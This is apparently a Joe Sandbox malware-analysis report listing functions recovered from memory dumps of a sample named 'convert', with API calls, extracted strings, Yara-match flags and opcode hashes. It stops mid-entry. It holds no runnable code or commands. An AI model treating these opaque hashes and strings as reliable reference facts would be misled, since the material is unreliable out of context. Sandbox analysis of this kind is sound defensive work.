LdrInitializeThunk.NTDLL ref: 03762DFA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 71f857fc4d552cc50a86f8c00ace636a825d2f082cfe7c29b02c09897afb8910
Instruction ID: 6b83cba32c35fd1c081d0c46228bf5859e4d7564a1e008909c0c6538c4929ea2
Opcode Fuzzy Hash: 71f857fc4d552cc50a86f8c00ace636a825d2f082cfe7c29b02c09897afb8910
Instruction Fuzzy Hash: 7C90023120150823E511B1588549707000987D0241F96C432A0424568D97568A52A122

Function 03762DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762DDA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dffc40bc45acb48a050a61b67785ee2dbe2defc5715be1edc8752531d92ce936
Instruction ID: a01971ebcf51cf2602bec7e764bf045abefbb753d6cb5566fee66f6397d087e6
Opcode Fuzzy Hash: dffc40bc45acb48a050a61b67785ee2dbe2defc5715be1edc8752531d92ce936
Instruction Fuzzy Hash: BF900221242545626945F1588449507400697E0241796C032A1414960C86269956D622

Function 03762C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762C7A

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ef4b1f279ddb3c887c62df3088f91fff73effe103481982bd5bb549259625994
Instruction ID: be7326918d6a64ec9e8e4cf30520f5f88b103d919f0f64b7eb141b815b0a7e38
Opcode Fuzzy Hash: ef4b1f279ddb3c887c62df3088f91fff73effe103481982bd5bb549259625994
Instruction Fuzzy Hash: 4090023120158C12E510B158C44974A000587D0301F5AC431A4424668D879589917122

Function 03762C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762C6A

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b7013ba5740ea90f174a51bd5064ae9a46544efc2ce131e607c7691eda6c2553
Instruction ID: 09f686a716c60f92e50e8f3ffbc721a450c33e320863fccdb7d035e1af4d3d0d
Opcode Fuzzy Hash: b7013ba5740ea90f174a51bd5064ae9a46544efc2ce131e607c7691eda6c2553
Instruction Fuzzy Hash: A990023120150C52E500B1588449B46000587E0301F56C036A0124664D8715C9517522

Function 03762CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762CAA

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4edc85f718901fe42a001a277e2d911399cea0fe9103b2c522b25361bc067452
Instruction ID: 2693f1ab73c1ab7b4226e743bc859de8c8d4219a6fe650a0eb139bd31274aa3f
Opcode Fuzzy Hash: 4edc85f718901fe42a001a277e2d911399cea0fe9103b2c522b25361bc067452
Instruction Fuzzy Hash: 1E90023120150812E500B598944D646000587E0301F56D031A5024565EC76589916132

Function 030096BE Relevance: 43.9, APIs: 1, Strings: 24, Instructions: 157
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009702

Strings

o, xrefs: 03009A12
\, xrefs: 030098C9
e , xrefs: 030099BE
O, xrefs: 03009950
#, xrefs: 030097C7
%, xrefs: 0300974F
5, xrefs: 030097B3
X, xrefs: 030097D1
9, xrefs: 03009763
5), xrefs: 0300996E
,, xrefs: 0300983C
{, xrefs: 030097DB
7, xrefs: 030099F4
4o, xrefs: 03009982
*, xrefs: 030099E0
@&, xrefs: 0300973E
^, xrefs: 030098AB
A, xrefs: 0300976D
27, xrefs: 03009A58
{, xrefs: 03009828
h, xrefs: 03009850
`>, xrefs: 0300998C
JM, xrefs: 030099AA
s", xrefs: 030098E7

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: #$%$*$,$27$4o$5$5)$7$9$@&$A$JM$X$\$^$`>$e $h$o$s"${${$O
API String ID: 2422867632-3962353844
Opcode ID: d53d6fad90d9368daee6a231b34d83ec205ed8dd6bbf2ea6ddb3dd56ce0a6c72
Instruction ID: f1489b4c4ea7f8f04ea770bf22253f6a05e6b45be9813d8842c289fc7613207c
Opcode Fuzzy Hash: d53d6fad90d9368daee6a231b34d83ec205ed8dd6bbf2ea6ddb3dd56ce0a6c72
Instruction Fuzzy Hash: 67916EB0905369DBEB20CF91C959BDEBBB0BB45308F1085C9D1593B281C7BA1A89CF90

Function 030107F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(-16743,00000111,00000000,00000000), ref: 03010867

Strings

-16743, xrefs: 0301086E, 03010871
-16743, xrefs: 0301085C, 03010866, 03010877

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: -16743$-16743
API String ID: 1836367815-2866452196
Opcode ID: 84ef14364d00fbdcfbdb26e7c7a8726f6548071c79749b5ddcb664a3e14e7484
Instruction ID: 3b453a8b01cd218c9a5ecadb6c4ab137faeb52d456c194e8245e39d8305d7133
Opcode Fuzzy Hash: 84ef14364d00fbdcfbdb26e7c7a8726f6548071c79749b5ddcb664a3e14e7484
Instruction Fuzzy Hash: 540196B5D0121C7AEB11EBE58C81DEFBB7CDF81694F058064FA147B140D6785E468BB1

Function 03022840 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 0302290B

Strings

net.dll, xrefs: 030228D4, 0302295A, 03022932, 0302293E, 03022966
wininet.dll, xrefs: 030228AB, 030228B7

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 0edf8a412495e5f197d370424c3cc71de5ad3ae2ece602e39c960750b6b084e3
Instruction ID: 97ed922fba6bc4105d77a252bcaf51e508aae29cf12b18cd250057243ae6933e
Opcode Fuzzy Hash: 0edf8a412495e5f197d370424c3cc71de5ad3ae2ece602e39c960750b6b084e3
Instruction Fuzzy Hash: 3D31A0B5602308BBD754DFA5C880FE7FBBCAB88710F10491DB55A6B245D3B0BA40CBA5

Function 0301E8D5 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0301E8F7

Strings

@J7<, xrefs: 0301E90B

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 06af2f625b27e796665f8755f7d7a891e68b934e70c511b4cf57ba6905f6a968
Instruction ID: ffeae5382af127d7ff33ce208cdaf0f38d9f5c2a5ddc5a8fc830c7ed6586b6c0
Opcode Fuzzy Hash: 06af2f625b27e796665f8755f7d7a891e68b934e70c511b4cf57ba6905f6a968
Instruction Fuzzy Hash: 313132B5A006099FDB50DFD8DC809EFB7B9FF88304B104559E945AB214D775AE05CBA0

Function 0301E8E0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0301E8F7

Strings

@J7<, xrefs: 0301E90B

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 7331c2131f25505d04c6d1ec0b2750261bb05eaa1f5215892b570233e9bc9fdf
Instruction ID: 041ae5db43673ad4833e4e1beb0b7d504e975b24b531db6f9debfeb4427d775c
Opcode Fuzzy Hash: 7331c2131f25505d04c6d1ec0b2750261bb05eaa1f5215892b570233e9bc9fdf
Instruction Fuzzy Hash: E9312FB5A0060A9FDB00DFD8D8809EFB7B9BF88304F108559E945AB214D775EE05CBA0

Function 03017877 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,030116F0,03026A67,03024347,?), ref: 030178B0

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 4c0908949d7423160e7c37c9631d55875d9d4390a6c3d0768191bbb81d9ee446
Instruction ID: 16591f9bf3ca3a7edfb2d04f57fedd23b6d954a898802bf77fff6386e511ec91
Opcode Fuzzy Hash: 4c0908949d7423160e7c37c9631d55875d9d4390a6c3d0768191bbb81d9ee446
Instruction Fuzzy Hash: 2E01A7B5A413187BEA50F7E4DC41FEA37DCAB88214F044485F90C9B581E671A9908765

Function 03014170 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030141E2

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 6945c84d21f093eaaaa8d35cfda629143065d96eb732340c6fb4e64a5480fff7
Instruction ID: 23033586d85a7963250e3e947bad8c2a1e6b05cef6761851631a2681370c9274
Opcode Fuzzy Hash: 6945c84d21f093eaaaa8d35cfda629143065d96eb732340c6fb4e64a5480fff7
Instruction Fuzzy Hash: F5011EB9E4120DABDB54DAE5DC41FDDB7B89B54308F044195ED189B240FA31E718CB91

Function 030280E0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(03010CA1,03010CC9,03010AA1,00000000,03017A33,00000010,03010CC9,?,?,00000044,03010CC9,00000010,03017A33,00000000,03010AA1,03010CC9), ref: 03028140

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 4ec04e332088019f77e5a68b723e6332975a17320e67a050fbdfb5f151ae979b
Instruction ID: e6b68a4c40f58cf6999ea4ba9e530c9b09684fb4cfa83ac56f4148e7a43c19c8
Opcode Fuzzy Hash: 4ec04e332088019f77e5a68b723e6332975a17320e67a050fbdfb5f151ae979b
Instruction Fuzzy Hash: 980180B6215208BBCB44DE99DC80EDB77ADAF8C754F518509BA09E7244D630F8518BA4

Function 030141F0 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030141E2

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 175c931debf1580fbe879dd5c021775c5345b6264a76dbfba9cb6e95e761e372
Instruction ID: 6fc2a441dfcf57306319aa41a60567a2d54f3f5d376717e059a5cb05d9b2f0bb
Opcode Fuzzy Hash: 175c931debf1580fbe879dd5c021775c5345b6264a76dbfba9cb6e95e761e372
Instruction Fuzzy Hash: 08F04C74D44219BEDF92EA59DC45FDABBBCEB51344F0042A1E818CB111F670E525CBE1

Function 030096C0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009702

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6131d0c195775028aa1c6b57bec050ede0c452ca616e777d92260d6ae0d2d290
Instruction ID: c2e577757ccc6ca9fcbd4a1838eb347cd8ca985c89851c3c397f2efe9fe7f0f1
Opcode Fuzzy Hash: 6131d0c195775028aa1c6b57bec050ede0c452ca616e777d92260d6ae0d2d290
Instruction Fuzzy Hash: BFF0C97B28132436E220A5A9AC02FDBB69CDFC0B65F240426F60DEA5C0D9A6B94147A5

Function 03028000 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(03011409,?,0302474F,03011409,03024347,0302474F,?,03011409,03024347,00001000,?,?,030298B0), ref: 0302803C

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ba9a21ff84f177d89c2414595160b1a516c624c40ee2b18da29ba7c6b0e6e00d
Instruction ID: 55e0daa62e6bac320ed2a12ac479f50da63a99347cd0de217ba3534f7d0cf697
Opcode Fuzzy Hash: ba9a21ff84f177d89c2414595160b1a516c624c40ee2b18da29ba7c6b0e6e00d
Instruction Fuzzy Hash: 69E06D7A6442057BD614EE58DC44EEB37ACDFC4710F404419FA18A7240D670B8108BB5

Function 03028050 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,D70B08E2,00000007,00000000,00000004,00000000,03013A4E,000000F4,?,?,?,?,?), ref: 0302808F

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e38f2aa0dad7a37cc574240ecb6ebf3c317ee95d0a10442d266198a4d327c2ea
Instruction ID: 681440c55fe1e2904aaf897bef947d7d6206ba432ee0d064b88da1c40a37297d
Opcode Fuzzy Hash: e38f2aa0dad7a37cc574240ecb6ebf3c317ee95d0a10442d266198a4d327c2ea
Instruction Fuzzy Hash: 21E0657A6042047BD614EE98DC40EEB77ACEFC9710F404419FA19AB241DA30B9118BBA

Function 03017880 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,030116F0,03026A67,03024347,?), ref: 030178B0

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 6ed6e32fea5abb83d8ff017e3939c58db570686ee228b3571e8ae3c97ac8abf0
Instruction ID: 22ff53cf4b669fe0ee923c9f6039380ca9001b27e6e03cc924430d0eff1d2408
Opcode Fuzzy Hash: 6ed6e32fea5abb83d8ff017e3939c58db570686ee228b3571e8ae3c97ac8abf0
Instruction Fuzzy Hash: 42D0A7756803043BF650F6F4DC02F5B368C9B40754F494464FA08EB6C2E966F8504675

Function 03017A8F Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE ref: 03017A99

Memory Dump Source

Source File: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3000000_convert.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
Instruction ID: 60992af89223e5aa8dd12ed8c7de33cc325b4a4aa95fa6362cf6069eb87e9fb4
Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
Instruction Fuzzy Hash: 87C08C3222240804EB2085FC78882A373888BC273CB584E10F42DDB4E0C12396B7D200

Function 03762C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03762C24

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 70ffb43fba3701574ac1fef526721fa361ce2525a6b4dd12060eb53494122d8d
Instruction ID: 33af3d306cf58c9662316bb7eed01d0748ee0ce01d2f42164a9c5ce015333eed
Opcode Fuzzy Hash: 70ffb43fba3701574ac1fef526721fa361ce2525a6b4dd12060eb53494122d8d
Instruction Fuzzy Hash: 28B09B719015C5D9EF51E760460D717794467D0701F1AC471D6030651F4739C1D1E176

Non-executed Functions

Function 035CB929 Relevance: 56.5, Strings: 45, Instructions: 217COMMON

Download Yara Rule

Strings

@@@@, xrefs: 035CBB0F
@@@@, xrefs: 035CBAEC
@@@@, xrefs: 035CBA60
@@@@, xrefs: 035CBA44
!"#$, xrefs: 035CBA0C
@@@@, xrefs: 035CBA52
@@@@, xrefs: 035CBA3D
-./0, xrefs: 035CBA21
@@@@, xrefs: 035CBA7C
@@@@, xrefs: 035CBB01
@@@@, xrefs: 035CBAE5
@@@@, xrefs: 035CBA9F
@@@@, xrefs: 035CBA75
@@@@, xrefs: 035CBA98
@@@@, xrefs: 035CBABB
@@@@, xrefs: 035CBAAD
@@@@, xrefs: 035CBAF3
@@@@, xrefs: 035CBAD7
89:;, xrefs: 035CB9B1
@@@@, xrefs: 035CBAC2
@@@@, xrefs: 035CBAA6
@@@@, xrefs: 035CBA6E
@@@@, xrefs: 035CB9BF
@@@@, xrefs: 035CBA91
@@@@, xrefs: 035CBA36
@@@@, xrefs: 035CBAC9
@@@@, xrefs: 035CBAD0
@@@@, xrefs: 035CBA83
@@@@, xrefs: 035CBA8A
?, xrefs: 035CBB20
@@@@, xrefs: 035CBAB4
@@@@, xrefs: 035CBA4B
<=@@, xrefs: 035CB9B8
%&'(, xrefs: 035CBA13
@@@@, xrefs: 035CBAFA
@@@@, xrefs: 035CBA59
123@, xrefs: 035CBA28
@@@?, xrefs: 035CB9A3
@@@@, xrefs: 035CBA67
@@@@, xrefs: 035CBA2F
@@@@, xrefs: 035CBADE
@@@@, xrefs: 035CB9F7
@@@@, xrefs: 035CBB08
4567, xrefs: 035CB9AA
)*+,, xrefs: 035CBA1A

Memory Dump Source

Source File: 0000000B.00000002.2511513222.00000000035C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_35c0000_convert.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: 11a945200544bbee3c4f0782dbbffaaa8b41193eb8095b6d86596d8a3cbce8ff
Instruction ID: b59274935e650989f049cb1587b08fd1a72a6869b8b67064c0d37cb64564aa70
Opcode Fuzzy Hash: 11a945200544bbee3c4f0782dbbffaaa8b41193eb8095b6d86596d8a3cbce8ff
Instruction Fuzzy Hash: E6913FF04582948AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85

Function 035C2DD7 Relevance: 20.1, Strings: 16, Instructions: 58COMMON

Download Yara Rule

Strings

jnwj, xrefs: 035C2EA4
ljnw, xrefs: 035C2E42
mijw, xrefs: 035C2E88
8?8, xrefs: 035C2E96
+0vl, xrefs: 035C2E9D
joyq, xrefs: 035C2E49
1+64, xrefs: 035C2E73
lwiy, xrefs: 035C2DFC
hlny, xrefs: 035C2E8F
wiwk, xrefs: 035C2E81
02<y, xrefs: 035C2E5E
owhb, xrefs: 035C2E18
ompy, xrefs: 035C2E26
558v, xrefs: 035C2DF0
<vmm, xrefs: 035C2E7A
=6.*, xrefs: 035C2E0A

Memory Dump Source

Source File: 0000000B.00000002.2511513222.00000000035C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_35c0000_convert.jbxd

Similarity

API ID:
String ID: 8?8$+0vl$02<y$1+64$558v$<vmm$=6.*$hlny$jnwj$joyq$ljnw$lwiy$mijw$ompy$owhb$wiwk
API String ID: 0-16114635
Opcode ID: 92275effc1e56b7681f4e6a8c13f816232f7c24f92beca229910130515dfd729
Instruction ID: 5a8d0dbf32e4aa356a6f2e6856aeafbee51142eea5e8aa1259b0d5774ed3834e
Opcode Fuzzy Hash: 92275effc1e56b7681f4e6a8c13f816232f7c24f92beca229910130515dfd729
Instruction Fuzzy Hash: 40212FB4410B0DDECF14EF85E6416EDBB75FF00308F91905AE8196B348C676869ACB89

Function 03762890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0376293C
___swprintf_l.LIBCMT ref: 0376295E
___swprintf_l.LIBCMT ref: 037629A3
___swprintf_l.LIBCMT ref: 0379A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0379A527
:%u.%u.%u.%u, xrefs: 0379A5B8
ffff:, xrefs: 0379A504
::ffff:0:%u.%u.%u.%u, xrefs: 0379A54E

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 7a80ce0b692b8476f024651ecc4840b8a0e4f59d2ebb500eccf76bd25e155636
Instruction ID: d64a4f5940ac886f2082597228dd17c3409194c558bafdc62f919c200d873a20
Opcode Fuzzy Hash: 7a80ce0b692b8476f024651ecc4840b8a0e4f59d2ebb500eccf76bd25e155636
Instruction Fuzzy Hash: A451D8B6B00216BFDF50DF988C9097EF7B8BB48201714C66AE865D7642D734DE50DBA0

Function 03757630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03794655
CLIENT(ntdll): Processing section info %ws..., xrefs: 03794787
ExecuteOptions, xrefs: 037946A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03794725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03794742
Execute=1, xrefs: 03794713
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 037946FC

Memory Dump Source

Source File: 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true

Associated: 0000000B.00000002.2511816006.0000000003819000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000381D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36f0000_convert.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 7255f7143486b3ce0f8af8e6b9a99534572ae62214024eed5e66d582fd6eae3b
Instruction ID: 2286d3d25239f4b6c98257f39d661759cc1fd2df3715242d72a8ab0e3135159c
Opcode Fuzzy Hash: 7255f7143486b3ce0f8af8e6b9a99534572ae62214024eed5e66d582fd6eae3b
Instruction Fuzzy Hash: E1512975601359AEEF18EAA8EC99FAE73ECEF44300F0401D9F905AB1C1E7B09A418F50

Function 0376B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0376B6BF

Strings

